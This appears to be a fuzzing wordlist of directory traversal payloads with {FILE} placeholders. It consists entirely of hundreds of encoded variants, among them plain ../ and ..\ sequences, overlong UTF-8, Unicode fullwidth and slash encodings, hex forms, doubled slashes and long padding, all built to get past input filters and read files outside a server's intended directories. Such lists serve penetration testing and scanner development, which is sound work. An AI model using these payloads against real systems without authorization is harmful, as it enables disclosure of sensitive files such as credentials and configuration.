AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}<br />
.../{FILE}<br />
.../.../{FILE}<br />
.../.../.../{FILE}<br />
.../.../.../.../{FILE}<br />
.../.../.../.../.../{FILE}<br />
.../.../.../.../.../.../{FILE}<br />
.../.../.../.../.../.../.../{FILE}<br />
.../.../.../.../.../.../.../.../{FILE}<br />
...\{FILE}<br />
...\...\{FILE}<br />
...\...\...\{FILE}<br />
...\...\...\...\{FILE}<br />
...\...\...\...\...\{FILE}<br />
...\...\...\...\...\...\{FILE}<br />
...\...\...\...\...\...\...\{FILE}<br />
...\...\...\...\...\...\...\...\{FILE}<br />
..../{FILE}<br />
..../..../{FILE}<br />
..../..../..../{FILE}<br />
..../..../..../..../{FILE}<br />
..../..../..../..../..../{FILE}<br />
..../..../..../..../..../..../{FILE}<br />
..../..../..../..../..../..../..../{FILE}<br />
..../..../..../..../..../..../..../..../{FILE}<br />
....\{FILE}<br />
....\....\{FILE}<br />
....\....\....\{FILE}<br />
....\....\....\....\{FILE}<br />
....\....\....\....\....\{FILE}<br />
....\....\....\....\....\....\{FILE}<br />
....\....\....\....\....\....\....\{FILE}<br />
....\....\....\....\....\....\....\....\{FILE}<br />
........................................................................../{FILE}<br />
........................................................................../../{FILE}<br />
........................................................................../../../{FILE}<br />
........................................................................../../../../{FILE}<br />
........................................................................../../../../../{FILE}<br />
........................................................................../../../../../../{FILE}<br />
........................................................................../../../../../../../{FILE}<br />
........................................................................../../../../../../../../{FILE}<br />
..........................................................................\{FILE}<br />
..........................................................................\..\{FILE}<br />
..........................................................................\..\..\{FILE}<br />
..........................................................................\..\..\..\{FILE}<br />
..........................................................................\..\..\..\..\{FILE}<br />
..........................................................................\..\..\..\..\..\{FILE}<br />
..........................................................................\..\..\..\..\..\..\{FILE}<br />
..........................................................................\..\..\..\..\..\..\..\{FILE}<br />
..%u2215{FILE}<br />
..%u2215..%u2215{FILE}<br />
..%u2215..%u2215..%u2215{FILE}<br />
..%u2215..%u2215..%u2215..%u2215{FILE}<br />
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}<br />
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}<br />
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}<br />
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}<br />
%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e/%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}<br />
%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
..%u2216{FILE}<br />
..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uF025{FILE}<br />
..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
..0x2f{FILE}<br />
..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
..0x5c{FILE}<br />
..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
///%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
\\\%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..//{FILE}<br />
..//..//{FILE}<br />
..//..//..//{FILE}<br />
..//..//..//..//{FILE}<br />
..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//..//{FILE}<br />
..///{FILE}<br />
..///..///{FILE}<br />
..///..///..///{FILE}<br />
..///..///..///..///{FILE}<br />
..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///..///{FILE}<br />
..\\{FILE}<br />
..\\..\\{FILE}<br />
..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\\{FILE}<br />
..\\\..\\\{FILE}<br />
..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
./\/./{FILE}<br />
./\/././\/./{FILE}<br />
./\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
.\/\.\{FILE}<br />
.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
